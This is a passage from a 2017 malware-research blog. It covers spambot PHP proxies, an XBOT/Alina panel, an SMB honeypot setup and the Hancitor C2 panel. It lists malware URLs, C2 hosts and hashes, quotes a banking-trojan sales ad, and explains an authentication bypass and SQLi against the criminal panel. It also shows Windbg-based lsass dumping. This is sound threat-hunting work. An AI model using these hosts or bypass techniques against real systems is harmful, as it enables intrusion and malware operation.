<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/PaD8qo.php
</td>
<td>7</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/XI2jHR.php
</td>
<td>7</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/8QE2UX.php
</td>
<td>6</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/Xou0HC.php
</td>
<td>6</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/19pYvo.php
</td>
<td>5</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/LPQQLc.php
</td>
<td>5</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
</table>
We can see 2 different cases:
<ul>
<li>Some PHP proxies are used in production</li>
<li>Some PHP proxies seems used for tests only.</li>
</ul>
</br>
<h1>Tests proxies</h1>
I'll start with the "tests proxies". I call them like that because they have only a few hits (~5) and all the hits on those pages are done by the same IP :]</br>
<b>66.180.197.197</b></br>
This IP is not new in this game :), do you remember <a href="https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html">the white listing feature</a> set in the spam bot panel ?</br>
This IP was in list of allowed IP in the Spambot panel:</br>
<img src="https://i.imgur.com/4ZCZdwa.png" height=300 /></br>
<iframe src="https://giphy.com/embed/12bihLkHoPwHTi" width="480" height="270" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></br>
Proxy scripts are configured to forward traffic to hxxp://194.247.13.222/tess/, it's Onliner Spambot, proably the testing instance.
</br></br>
<h1>Production proxies</h1>
Some details about each proxy scripts:
<h2>3E2s4R.php</h2>
This one is my favourite.</br>
The proxy records 610 787 hits on this file, from ~ 100 000 unique IPs and I'm unable to find any sample on public sandox.</br>
This is a lot of hits if we think that these statistics concern only 1 proxy!
It was used to forward the Spambot traffic to 194.247.13.196</br>
</br>
<h2>re.php</h2>
This one was hit 137 352 times by 1335 uniques IPs. It is used to forward JSDropper traffic to 94.177.196.246.</br>
This Proxy was used for the JSDropper campaign <b>"NEWIT"</b> (Ursnif)</br>
Interesting fact of this one: 51.28% of hits are done by the IP 2.228.128.141 (Italy).</br>
Some IOCs:</br>
urls:</br>
<ul>
<li><a href="http://www.vxvault.net/ViriFiche.php?ID=34580">hxxp://454391.webx04.mmc.at/re.php?cmd=e</a></li>
<li><a href="http://www.vxvault.net/ViriFiche.php?ID=34662">hxxp://werbekalender-werbenotebooks.de/re.php?cmd=e</a></li>
<li><a href="http://vxvault.net/ViriFiche.php?ID=34589">hxxp://46.163.110.45/css/re.php?cmd=e</a></li>
<li><a href="http://vxvault.net/ViriFiche.php?ID=34590">hxxp://patrickhess.de/re.php?cmd=e</a></li>
<li><a href="http://vxvault.net/ViriFiche.php?ID=34588">hxxp://siegi-kleindienst.at/re.php?cmd=e</a></li>
<li><a href="http://vxvault.net/ViriFiche.php?ID=34587">hxxp://hostelinramallah.com/re.php?cmd=e</a></li>
</ul>
samples:</br>
<ul>
<li>d5291865ff80cd7cc9f425a145351bb7234383f1</li>
<li>67e1c342f6b41d163a6208b3ccebb991c0650473</li>
</ul>
<h2>term.php</h2>
Used to forward JSDropper traffic to 94.177.196.246</br>
121 669 hits from 2259 unique IPs.</br>
It was used for campaigns <b>"WASP","iphone","summer","old", "u1", "NEWIT"</b> and <b>"404"</b> (Ursnif)</br>
</br>
Some IOCs:</br>
urls:</br>
<ul>
<li>hxxp://www.volf.de/term.php?cmd=e</li>
<li>hxxp://pajaje.borec.cz/term.php?cmd=e</li>
<li>hxxp://hotelsantantonio.com/term.php?cmd=e</li>
<li>hxxp://46.163.110.45/css/term.php?cmd=e</li>
<li>hxxp://fb-arredamenti.it/term.php?cmd=e</li>
<li>hxxp://psymaster.wz.cz/term.php?cmd=e</li>
<li>hxxp://getting-reconnected.de/term.php?cmd=e</li>
<li>hxxp://ebkk.nl/term.php?cmd=e</li>
<li>hxxp://supercondmat.org/term.php?cmd=e</li>
</ul>
samples:</br>
<ul>
<li>2016dfb44f452adcdd96b7781fdfb581ac72b0f7392404805f08d57210d16ad9</li>
<li>a1bd385b59efe1be13da9e8a008e06a6fb6cc07acd2727be22d076c7a2b27155</li>
<li>01853d1552ca4032e5fdc251cc92d57dffd5912411666c7842106d730ada09f4</li>
</ul>
<h2>l2.php</h2>
Used to forward JSDropper traffic to 109.120.142.156
52 288 hits from 716 unique IPs.</br>
This one is very old. I've logs from November 2016 for this scripts.</br>
At this time they was not using campaign or group name, and they was using ... Ursnif.</br>
</br>
Some IOCs:</br>
urls:</br>
<ul>
<li>http://151.236.13.49/l2.php</li>
<li>http://191860.webhosting63.1blu.de/l2.php</li>
<li>http://454391.webx04.mmc.at/l2.php</li>
<li>http://46.163.110.45/css/l2.php</li>
<li>http://ballettschule-nottuln.de/l2.php</li>
<li>http://edle-steine.at/l2.php</li>
<li>http://enmoto.com/l2.php</li>
<li>http://evastrutzmann.at/l2.php</li>
<li>http://evi-verein.at/l2.php</li>
<li>http://fioravanti-production.org/l2.php</li>
<li>http://friesl-keramik.at/l2.php</li>
<li>http://ftp.dimensionevideo.it/l2.php</li>
<li>http://ftp.italiabrowsergame.com/l2.php</li>
<li>http://getting-reconnected.de/l2.php</li>
<li>http://gunnebo.eniac.it/l2.php</li>
<li>http://hobbygartenteich.at/l2.php</li>
<li>http://hotelsantantonio.com/l2.php</li>
<li>http://humanitas-gbr.de/l2.php</li>
<li>http://jambasket.com.hk/l2.php</li>
<li>http://juwelier-hohenberger.de/l2.php</li>
<li>http://katstones.de/l2.php</li>
<li>http://lklv.wz.cz/l2.php</li>
<li>http://mauriz.at/l2.php</li>
<li>http://meindl-edv.eu/l2.php</li>
<li>http://nr11303.vhost-enzo.sil.at/l2.php</li>
<li>http://pajaje.borec.cz/l2.php</li>
<li>http://patrickhess.de/l2.php</li>
<li>http://pferdemedizin-stanek.at/l2.php</li>
<li>http://portoverde.it/l2.php</li>
<li>http://positivemindstates.com/l2.php</li>
<li>http://psymaster.wz.cz/l2.php</li>
<li>http://reimer-wulf.de/l2.php</li>
<li>http://sca.homelinux.com/l2.php</li>
<li>http://spatialpourtous.com/l2.php</li>
<li>http://supercondmat.org/l2.php</li>
<li>http://tennis-arnfels.at/l2.php</li>
<li>http://tischlerei-kreiner.at/l2.php</li>
<li>http://umzuegeberlin.com/l2.php</li>
<li>http://www.diamondfitness.hu/l2.php</li>
<li>http://www.drogenhilfezentrum.de/l2.php</li>
<li>http://www.dtk-brandenburg.de/l2.php</li>
<li>http://www.elektro-morjan.de/l2.php</li>
<li>http://www.kurzhaarteckel-trakehner.de/l2.php</li>
<li>http://www.midnightlady2006.de/l2.php</li>
<li>http://www.msinformatica.it/l2.php</li>
<li>http://www.seelackenmuseum-sbg.at/l2.php</li>
<li>http://www.skyways-ragdolls-zwergspitze.de/l2.php</li>
<li>http://www.teeversand24.net/l2.php</li>
<li>http://www.valentinavalsania.it/mdb-databases/cgi-bin/l2.php</li>
<li>http://www.webstream.at/l2.php</li>
</ul>
samples:</br>
<ul>
<li>a10cd296e3f58fe329bbff6edaf0bdbb1f9099a088b7a5cede583dda09dd7cf2</li>
<li>5add967a8dc9d7669e7d8da9882329600874b3a35d2a8f087820438ae112cecd</li>
<li>fbfe6048514c7fc944c0f56a480d8c4963fce9018b5d3ae8cf39c5840979930c</li>
<li>9a44ff53471012328a3b167c149ed71c2e82b117de8f9463f5773b5b4f5cc7b6</li>
<li>0bf1c1b457818bf7acb6eda33b0f8eb6e9ce026aee620707f6b4e4b58a2e77d0</li>
</ul>
<h2>r4.php</h2>
And the last one: r4.php.</br>
1884 hits by 302 IPs. Used during the campaigns <b>"mk1" "mk2" "bomber"</b> and one with no name <b>""</b></br>
Some IOCs:</br>
urls:</br>
<ul>
<li>hxxp://191860.webhosting63.1blu.de/r4.php?cmd=e</li>
<li>hxxp://werbekalender-werbenotebooks.de/r4.php?cmd=e</li>
<li>http://positivemindstates.com/r4.php?cmd=e</li>
<li>di000240.host.inode.at/r4.php?cmd=e</li>
<li>http://patrickhess.de/r4.php?cmd=e</li>
</ul>
samples:</br>
<ul>
<li>c827511b425cbc91faf947f1c3d309db3dde7419fe8c892380a03c71b5196e0e</li>
</ul>
<h1>Résumé</h1>
<a href="https://i.imgur.com/H2MC92l.png"><img src="https://i.imgur.com/H2MC92l.png" height=650/></a></br>
This threat start to be very noisy, they continue to spread malware always in the same way.</br>
If somebody who's reading this works on the Ursnif part, don't hesitate to ping me I'll share my data :]</br>
</br>
I hope that this example can help you to better understand cybercrime threats. Happy hunting \o/</br>
<iframe src="https://giphy.com/embed/Q22kcRdASuBvW" width="480" height="370" frameBorder="0" class="giphy-embed" allowFullScreen></iframe>Benkow_http://www.blogger.com/profile/00709869309686004611noreply@blogger.comtag:blogger.com,1999:blog-330713861169915021.post-76108744788224715792017-08-16T14:16:00.001-07:002017-10-13T11:47:17.767-07:00Quick look at another Alina fork: XBOT-POS Edit: In fact after looking at the sample it's a pure copy pasta of Tiny Nuke :) - cd025523e3aec57f809552b9d1adc4b89526cc632f6d4c481aa2c8c3501dda6b </br> </br>
Hi,
it's time for a new post. Today I'll try to have a look at the "Team NZMR" </br>
I've found this funny team by hazard on Twitter via the bot <a href="https://twitter.com/ScumBots/">@ScumBots</a>
<blockquote class="twitter-tweet" data-lang="fr"><p lang="en" dir="ltr">Alina: <a href="https://t.co/ttyh5aEJDX">https://t.co/ttyh5aEJDX</a> C2:thzsmrjqqzpaz2mz[.]onion[.]link/al/loading[.]php,t[.]ht/al/loading[.]php,</p>— ScumBots (@ScumBots) <a href="https://twitter.com/ScumBots/status/897473640853372929">15 août 2017</a></blockquote>
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script>
I would like to write this little blog post because I think that this is interesting to see an Alina panel behind a .onion domain and as you can see later, I like look at some weird panels :D.
</br>
Let's have a look on this server.
</br>
As we know, we have an Alina (<a href="http://www.xylibox.com/2013/10/inside-malware-campaign-alina-dexter.html">Well known POS malware</a>) panel at <code>thzsmrjqqzpaz2mz.onion.link/al/loading.php</code>. </br>
Samples: <code>26aa9709d0402157d9d36e4849b1f9bacecd8875169c7f26d7d40c5c0c3de298 (http://thzsmrjqqzpaz2mz.onion.link/al/Spark.exe)</code></br>
</br>
<a href="https://i.imgur.com/UPmYouS.png"><img src="https://i.imgur.com/UPmYouS.png" height=150px;></a>
</br>
In the same boring way, we can found:
<ul>
<li>
a Fareit/Pony panel at <code>https://thzsmrjqqzpaz2mz.onion.link/pn/admin.php</code> (I don't have sample)
</li>
<li>
an <a href="http://blog.malwaremustdie.org/2016/06/mmd-0054-2016-atmos-botnet-and-facts.html">Atmos</a> at <code>https://thzsmrjqqzpaz2mz.onion.link/at/cp.php</code> :</br>
Sample e34720cc8ab3718413064f19af5cc704e95661e743293a19f218d3b675147525 (https://thzsmrjqqzpaz2mz.onion.link/at/files/us.exe)</br>
<a href="https://i.imgur.com/l4pciLn.png"><img src="https://i.imgur.com/l4pciLn.png" height=190px;></a>
</br>
Thanks to <a href="http://cybercrime-tracker.net/ccamdetail.php?hash=62702b2be0e290e01cfe43107009098caa19ce68">CCAM</a> we can get 2 new servers used by this team:
<ul>
<li>
http://netco1000.ddns.net/at/file.php
</li>
<li>
http://22klzn6kzjlwlmt2.onion.link/at/file.php
</li>
</ul>
</li>
</ul>
Those guys really want your creds and your credit card numbers :D</br>
<iframe src="https://giphy.com/embed/ZiDPVVQrm1IIM" width="480" height="234" frameBorder="0" class="giphy-embed" allowFullScreen></iframe> </br>
</br>
They also try to deal with ransomware (<a href="https://id-ransomware.blogspot.fr/2017/07/nzmr-ransomware.html">NZMR Ransomware</a>) at <code>https://thzsmrjqqzpaz2mz.onion.link/ed2/</code> without success...</br>
<img src="https://i.imgur.com/5GzpeUq.png" height=300px;> </br>
</br>
But I've write this quick blog post for the last panel, </br>
Let me introduce you XBOT panel \o/: <code>https://thzsmrjqqzpaz2mz.onion.link/panel/</code> </br>
(click to enlarge)</br>
<a href="http://imgur.com/Jd7FHd7"><img src="https://i.imgur.com/Jd7FHd7.png" height=300px;></a></br>
The bot ad:</br>
<code>
Selling xbot ,new bank trojan -- Modules -- Webinject -- Formgrabber -- Socket4/5 -- Hidden VNC</br>
New bot bank xbot is available for rent (800$/monthly) -- server on tornetwork/clearnet</br>
Customized programming service and web developer/c/c++/Python/NET/others</br>
Team Coder/NZMR</br>
xbot costs 3k $ modules available >webinject -- formgrabber -- Socket4/5 -- Hidden VNC</br>
When buying xbot what do you get?</br>
You will get the builder,bin/exe+socket.exe/server.exe hvnc</br>
[+] - Free installation on your server in tornetwork or clearnet, you choose</br>
[+] - monthly support paid 100 $ (you choose,with or without support)</br>
[+] - Update bot for new version 400 $</br>
[+] Rent xbot</br>
Panel access (Clearnet/Tornetwork)</br>
Bin (exe)</br>
Socket.exe/hvnc.exe</br>
Priçe</br>
800 $ monthly (First 6 customers, others 1k $)</br>
Support monthly 100 $ (btc)</br>
</code>
I don't have any sample yet but if you have one, i'm REALLY interrested :D. </br>
Thanks to Xylitol this panel looks like a mix between Alina and Dexter. For example the URI scheme "/front/stats.php", the successstatuscode 666 or this page "Version Control":</br>
<a href="https://i.imgur.com/GNonEsC.png"><img src="https://i.imgur.com/GNonEsC.png" height=510px;></a></br>
This panel looks designed for Banking stuff (webinjects) and POS malware.</br>
From XBOT panel you can DL/Exec, Start VNC sessions, socks sessions and update bots:</br>
<a href="https://i.imgur.com/vrfPat4.png"><img src="https://i.imgur.com/vrfPat4.png" height=210px;></a></br>
</br>
We can also found some strange "webinjects" stuff:</br>
<a href="https://i.imgur.com/gBAT9rg.jpg"><img src="https://i.imgur.com/gBAT9rg.jpg" height=650px;></a></br>
where "view content" leads to these kinds of data:</br>
<a href="https://i.imgur.com/oHk21I8.png"><img src="https://i.imgur.com/oHk21I8.png" height=100px;></a></br>
</br>
Some settings (look at the Alinas 666 status code):</br>
<a href="https://i.imgur.com/ZiXA6Hv.png"><img src="https://i.imgur.com/ZiXA6Hv.png" height=310px;></a></br>
<a href="https://i.imgur.com/SEfAnT3.png"><img src="https://i.imgur.com/SEfAnT3.png" height=320px;></a></br>
You can also add some bins in the panel database. Currently, they have 8472 Bins in the database.</br>
And finally the bot lists (~600 bots if I trust the bots list).</br>
<a href="https://i.imgur.com/Pmci3QO.jpg"><img src="https://i.imgur.com/Pmci3QO.jpg" height=650px;></a></br>
I've uploaded the whole list of bots on <a href="https://imgur.com/a/9FUo5">this album</a>. Ping me if you're on the list :D I'm really curious to see the binary part</br>
And finally the database structure reminds again Alina:
<iframe src="https://pastebin.com/embed_iframe/rbAayP1D/noheader" style="border:none;width:100%"></iframe>
By this way we will find soon more Alina forks than Zeus forks \o/</br>
</br>
So, NOPE! it's not a super new next gen POS malware, it's just another Alina Fork :D but this webinjects part looks curious :) and the team seems very active.</br>
But come one, 3k$ for open sourced malware haha...
</br>
<iframe src="https://giphy.com/embed/Raf0YXvvFD2lG" width="480" height="270" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></br>
Thanks for your time, thanks to Xylitol and happy hunting :)
</br>
</br>
IOCs:</br></br>
<code>
http://thzsmrjqqzpaz2mz.onion.link/al/Spark.exe (Alina)
http://thzsmrjqqzpaz2mz.onion.link/payload.exe (Neutrino)
http://thzsmrjqqzpaz2mz.onion.link/at/files/us.exe (Atmos)
http://22klzn6kzjlwlmt2.onion.link/al/Spark.exe (Alina)
http://22klzn6kzjlwlmt2.onion.link/al/payload.exe (Neutrino
http://22klzn6kzjlwlmt2.onion.link/al/files/us.exe (Atmos)
http://netco1000.ddns.net
http://netco400.ddns.net/Dia (Gorynch)
http://netco400.ddns.net/at/(Atmos)
e34720cc8ab3718413064f19af5cc704e95661e743293a19f218d3b675147525 (atmos)
26aa9709d0402157d9d36e4849b1f9bacecd8875169c7f26d7d40c5c0c3de298 (Alina)
8a62f61c4d11d83550ab4baceb9b18d980a4c590723f549f97661a32c1731aff (neutrino)
</code><strike></strike>
</br>
</br>
Benkow_http://www.blogger.com/profile/00709869309686004611noreply@blogger.comtag:blogger.com,1999:blog-330713861169915021.post-14854394938478792662017-05-28T02:11:00.000-07:002017-05-29T10:49:30.513-07:00Feedback on how build SMB HoneypotHey,
</br></br>
During the painful "Wannacry weekend" I've received a lot of message asking for help to create a SMB Honeypot.</br>
I'll try here to explain how I've create mine.</br>
It's 2017 but it looks like it's useful to remind that Honeypot are really useful.</br>
I've read a lot of papers about Wannacry variants during the wannacry crisis, but I've never saw them in the wild. A lot of trolls has uploaded patched versions of the w0rm in Virustotal and has waited for the first paper about a new variante....</br>
<center> <iframe src="https://giphy.com/embed/zagB8wzgm4Ce4" width="480" height="360" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center>
</br>
This post will not explain all the steps for building a Honeypot but it will try to give some tips and ideas.</br>
<h1>Exposing port 445</h1>
So, we need to create a honeypot for monitoring SMB network and catching Wannacry in the more automatical way possible.</br>
First of all let's try to expose port 445. In many countries, it's really complicated to expose SMB over the Internet \o/!</br></br>
My first try was to install a Windows VM with a shared directory (Windows 7 x64 because it's a very used OS in corporations, and hey we're in 2017, people uses 64bits OSs), and configure NAT rules in my home router:</br>
<pre>
+--------+ +----------+ +----------+
|Internet|---445--->|homerouter|---445--->|Windows VM|
+--------+ +----------+ +----------+
</pre>
I've obviously disable Windows Firewall and Windows Defender but when I've try to nmap the 445 port the port was always filtered:
<pre>
Host is up.
PORT STATE SERVICE VERSION
445/tcp filtered microsoft-ds
</pre>
After some tests with Wireshark it apears that my home router allows incomming packets on port 445 but blocks outcomming packets.</br>
I've reproduce this behaviour on French ISPs (SFR, Numericable, Orange), French hoster OVH, UK ISPs and some Digital Ocean VPSs</br>
Due to this, we have to bypass this hard coded Firewall rules. It's realy easy, we just have to forward SMB packets to another port than 445. But for that we need 2 other machine. One for forwarding incomming SMB packets to another port and the other for forwarding outcomming packets:
<pre>
+--------+
|Internet|-445-+
+--------+ |
|
+---+ +----------+
|VPS|--5555-->|homerouter|
+---+ +----------+
|
| +---+ +----------+
+-5555->|Rpi|--445-->|Windows VM|
+---+ +----------+
</pre>
You need a few iptables rules (sorry in advance, I'm not an iptables Jedi \o/). </br>
In the exposed VPS:</br>
</br>
iptables -t nat -A PREROUTING -p tcp --dport 445 -j DNAT --to-destination HOME_ROUTER_IP:5555</br>
iptables -A FORWARD -p tcp --dport 445 -j ACCEPT</br>
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE</br>
echo 1 > /proc/sys/net/ipv4/ip_forward</br>
</br></br>
and for the RaspberryPi config:
</br></br>
iptables -t nat -A PREROUTING -p tcp --dport 5555 -j DNAT --to-destination WINDOWS_VM:445</br>
iptables -A FORWARD -p tcp --dport 5555 -j ACCEPT</br>
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE</br>
echo 1 > /proc/sys/net/ipv4/ip_forward</br>
</br></br>
By this way, the 445 port of our Windows VM is ready to be pwned.</br>
To accelerate the pwning rate, I use many cheap VPSs around the world (I've used DigitalOcean, 1&1, HostAfrika...)</br>
<pre>
+--------+
|Internet|-445-+
+--------+ |
|
+---+
|VPS|--5555---------+
+---+ |
+---+ |
|VPS|--5555---------+
+---+ |
+---+ |
|VPS|--5555---------+
+---+ |
+---+ |
|VPS|--5555---------+
+---+ |
+---+ |
|VPS|--5555---------+
+---+ |
+---+ |
|VPS|--5555---------+
+---+ |
|
+----------+
|homerouter|
+----------+
|
| +---+ +----------+
+-5555->|Rpi|--445-->|Windows VM|
+---+ +----------+
</pre>
The big limit of this configuration is when the packet is into our Windows VM, the source IP is losted due to the iptables forwarding.</br>
In my case I capture traffic on VPSs and retrieve pcaps via <a href="http://www.kossboss.com/linuxtcpdump1">this trick </a> (thanks to <a href="https://twitter.com/kafeine">Kafeine</a> :D)</br>
</br>
<h1>Monitoring the endpoint</h1>
Because there is a lot of other malware than Wannacry it's important to monitor our Windows.</br>
For that, you have a lot of tools available; ProcMon is a good candidate, it's easy to run it and collect pmon trace automatially with the command line, for example here, you can launch it and save a pml trace:
<pre>
pmon.exe /AcceptEula /Backingfile C:\pmon.pml
</pre>
To stop procmon, run it like:</br>
<pre>
pmon.exe /Terminate
</pre>
There is a lot of solution for the behaviour part, you can use etw traces, Event viewer...
</br>The hardest part is to collect files dropped into our Honeypot.</br>
I think that the better way is to use <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/file-system-minifilter-drivers">Minifilter</a>, you can intercept writed PE files and save them in a specific location. <a href="https://github.com/Microsoft/Windows-driver-samples/tree/master/filesys/miniFilter/avscan">There is an almost ready to use example in the WDK.</a></br>
You can also hook WriteFile API in userland but it's easily bypassable. </br></br>
Just for fun you can even retrive writted files and a lot of cool information without developping tool, just with the very <strike>painfull</strike> powerfull debugger Windbg \o/.</br>
The idea is to use Windbg as kernel debugger, break on each <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa365747(v=vs.85).aspx">nt!ntWritefile</a>, and save Buffer parameter :D. </br>
But you can do more! Dumping lsass memory on each attack for example :) Oh, yes, forget about perf here :D it's for fun</br>
You have 2 options: the native diabolic scripting language of Windbg or the awesome python interface <a href="https://pykd.codeplex.com/">pykd</a></br>
Here I'll use pykd :)</br>
Download <a href="http://virtualkd.sysprogs.org/download/">VirtualKd</a> and install it into the VM (copy the "target" directory and run vminstall)</br>
Run vmmon before restarting the VM, on the next boot Windbg will pop.</br>
<img src="https://i.imgur.com/e6mNfFK.png" height=350px></br>
</br>
Press f5 and let Windows boots. When Windows is ready, break into Windbg (ctrl+pause).
</br>
Now we can do everything we want. For example let's try to dump the memory of lsass (usefull for fileless attack :) ) By dumping lsass memory you can even easily extract the payload binary :).
</br>
</br>
For that, load pykd extension into Windbg via:
<pre>
.load pykd
</pre>
And create your python script as you want.</br>
A dirty example here:
<iframe src="https://pastebin.com/embed_iframe/PkhsMtHp/noheader" style="border:none;width:100%"></iframe>
</br>
Finally, choose on wich action you want to break on Windbg, here we'll dump lsass each time it try to write a file:</br>
<pre>
bp nt!ntWriteFile "!py C:\smbhoneypot\dumper.py;g"
</pre>
Here we go, you are abble to collect a memory dump of lsass eatch time it was exploited to drop someting!</br>
</br>
From now you can extract just the <a href="https://msdn.microsoft.com/en-us/library/windows/hardware/ff567121(v=vs.85).aspx">buffer</a> of ntWriteFile, you can break on the vulnerability itself and trace execution etc. Plug your brain and be creative ! </br>
<img src="https://i.imgur.com/ouMh9PO.png" height=350px> </br>
It's quick to do, it's easy and it allow you to collect a lot of useful data.
<h1>Cleaning your honeypot</h1>
Another important point is to manipulate Virtual machine. For that you have a lot of tools availaible. </br>
In my case, I use VMWare on Windows. VMWare has a useful tools called <a href="https://pastebin.com/3e9YyQn3">vmrun</a>, with it you can power on ,power off,revert snapshot, retrieves files from VM (like a pmon trace), run command in VM, list files... etc</br>
Some command line example:</br>
<pre>
create snapshot:
vmrun.exe-T ws snapshot c:\VMs\honeypot.vmx snapshot_name
revert snapshot:
vmrun.exe-T ws snapshot revertToSnapshot c:\VMs\honeypot.vmx snapshot_name
run program in guest:
vmrun.exe -gu windows_user -gp windows_pwd runProgramInGuest \
c:\VMs\honeypot.vmx -activeWindow \
-interactive -noWait program.exe
get data from guest:
vmrun.exe -gu windows_user -gp windows_pwd copyFileFromGuestToHost \
c:\VMs\honeypot.vmx -activeWindow \
c:\guest\auto_run.txt c:\host\auto_run.txt
</pre>
There is similare tools for every hypervizor.
<h1>PROFIT</h1>
Last point: don't forget store all the data. Store everything you can, even if you don't know yet what to do with these data.</br>
Date, IPs source, memory dump, sample etc These data are gold mine.</br>
You can found a lot of python lib for parsing pcap, you can export windbg output, you can graph your pmon traces with tools like <a href="http://www.procdot.com/"> ProcDot</a>, forward your data in Kibana dashbords etc.</br>
<h1>Conclusion</h1>
This kind of infrastructure cost me around 30€/months for VPSs + 30€ for a RaspberryPi so less than 500€ by year for having a look at what happening in the wild, Having data, making stats, start some investigation etc :) </br>
<center><iframe src="https://giphy.com/embed/yjI5G3pE3NH3O" width="480" height="270" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center></br>
This kind of project are awesome because you have to deals with network, system, a little bit a dev, databases etc. You can even use this kind of honeypot for learning forensic for example!</br>
I strongly recommand to every people who want to learn malware hunting to build honeypots, on many services and on different countries.</br>
Of course you cannot catch advanced attacks with honeypot, but you can catch interresting malware with RDP or VNC honeypots for example</br>
<h1>Links</h1>
Some link that can help you:</br>
<a href="https://github.com/rabbitstack/fibratus">Tracing API call in Python: Fibratus</a></br>
<a href="https://medium.com/@vworri/extracting-the-payload-from-a-pcap-file-using-python-d938d7622d71">Example of how deal with pcap in Python</a></br>
<a href="http://cybercrime-tracker.net/tools/memdump.zip">memdump tools from CCT</a></br>
<a href="https://www.codeproject.com/Articles/43586/File-System-Filter-Driver-Tutorial">File System Filter Driver Tutorial</a></br>
<a href="https://theartofdev.com/windbg-cheat-sheet/">WinDbg cheat sheet</a></br>
<a href="http://www.vmware.com/pdf/vix160_vmrun_command.pdf">Using vmrun to Control Virtual Machines</a></br>
<a href="https://ruxcon.org.au/assets/2016/slides/ETW_16_RUXCON_NJR_no_notes.pdf">Make ETW Great Again. - Ruxcon 2016</a></br>
<a href="https://www.botconf.eu/wp-content/uploads/2015/12/OK-P04-Marc-Doudiet-Honey-Where-is-my-PoS.pdf">HONEY ? Where is my POS - Botconf</a></br>Benkow_http://www.blogger.com/profile/00709869309686004611noreply@blogger.comtag:blogger.com,1999:blog-330713861169915021.post-26419242992028538402017-03-16T00:17:00.000-07:002017-03-16T05:21:26.378-07:00Hancitor panel overviewHey! </br>
</br>
These weeks I've read a lot of <a href="https://twitter.com/search?f=tweets&vertical=default&q=hancitor&src=typd">tweets</a> about hancitor. Hancitor is even in the CheckPoint "top 5 Most Wanted malware" (¯\_(ツ)_/¯).</br>
You can read a lot of good stuff about the Hancitor/Fareit/Vawtrack/H1N1 gang, binaries reverse, proxy infra... but nothing about Hancitor web panels. So, I've write this (very) quick blogpost to show the attacker point of view :]</br></br>
<center><img src="https://i.imgur.com/YoDDnRP.png" height=200px></center>
</br>
Since admin has activated White-listing, it seems that it's not possible to access to the web panel via the Nginx Proxy. When you try to access to a page admin.php or panel.php etc, proxy returns a 403 error. For accessing the panel, you have to find the real IP behind proxies.</br>
<script src="//pastebin.com/embed_js/aQ7RKKQ6/noheader"></script>
</br>
Before the white-listing system, it was possible to access to Hancitor CNC due to a lot of vulns. Because these vuln are patched today, it's time to disclose some stuff. Let's have a look at this dropper C&C.
</br>
<h2>Bypassing authentication</h2>
<center><a href="https://i.imgur.com/jtzqqR4.png"><img src="https://i.imgur.com/jtzqqR4.png" height=300px></a></center>
</br>
When you want to access to a page, the panel developer checks if the user is authenticated with this kind of code:</br>
<script src="//pastebin.com/embed_js/fnVw85Sz/noheader"></script>
This is an old school kind of vulnerability \o/. They don't use an "exit()" after the header function.</br>
When you browse the page with a browser like Firefox, you are correctly redirected to google.com, however if you grab the page with CURL or WGET the header function is ignored and... all the PHP code is executed :). </br>
<center><img src="https://i.imgur.com/HtDaIxy.png" height=40px ></br></center>
</br>
Here we go, the panel is composed of 4 parts:</br>
<h3> Panel.php</h3>
<center><a href="https://i.imgur.com/jmiaXUr.png"><img src="https://i.imgur.com/l8vsccj.png" height=150px></a></center>
</br>
This is the main page, with some data about infected hosts.</br>
<h3>commands.php</h3>
<center><a href="https://i.imgur.com/TfTcg8i.png"><img src="https://i.imgur.com/TfTcg8i.png" height=290px></a></center>
This page is used for sending commands to the bots. You can send commands to a specific group of bots or to a specific location.</br>
The available commands are:</br>
<ul>
<li>Download and Run</li>
<li>BOT Start</li>
<li>DLL Load</li>
<li>EXE Load</li>
<li>Uninstall</li>
<li>Load Config</li>
<li>Update</li>
</ul>
Two interesting facts: There is an "uninstall" command and if you send the correct POST request to the page commands.php, without authent', it works :)</br>
<h3>passwords.php</h3>
<center><a href="https://i.imgur.com/8SJzyY6.png"><img src="https://i.imgur.com/FEJoDvI.png" height=290px></a></center>
This page is used for the password stealer module. I've never seen this feature used. It's maybe due to the fact that this gang use Fareit for stealing passwords...</br>
<h3>statistics.php</h3>
<center><a href="https://i.imgur.com/jGpLPNl.png"><img src="https://i.imgur.com/jGpLPNl.png" height=350px></a></center>
And finally the statistics page, you can found online/Online in the last 12 hours/offline and create a new group of bots.
</br>
Thanks to a SQLi we can see that the database structure is:</br>
<script src="//pastebin.com/embed_js/hKYg1FVD/noheader"></script>
</br></br>
As you can see, this super evil malware has a very basic CNC.</br>
Some articles about this threat:</br>
<ul>
<li><a href="http://blog.airbuscybersecurity.com/post/2016/11/Analysing-the-Hancitor-Maldoc">Analysing the Hancitor Maldoc</a></li>
<li><a href="https://www.damballa.com/wp-content/uploads/2015/08/Damballa_PonyUp.pdf">PonyUp: Tracing Pony’s Threat Cycle and Multi-Stage Infection Chain</a></li>
<li><a href="https://isc.sans.edu/forums/diary/HancitorPonyVawtrak+malspam/21919">Hancitor/Pony/Vawtrak malspam</a></li>
</ul>
I hope that this quick post can be useful for somebody</br>
</br>
</br>
</br>
</br>
</br>
</br>
<center><iframe src="//giphy.com/embed/9a9SgI0xItNmM" width="480" height="300" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center>Benkow_http://www.blogger.com/profile/00709869309686004611noreply@blogger.comtag:blogger.com,1999:blog-330713861169915021.post-42908112205197463652017-02-27T15:09:00.000-08:002018-12-04T09:34:44.486-08:00Spambot safari #2 - Online Mail System
Hey ! </br>
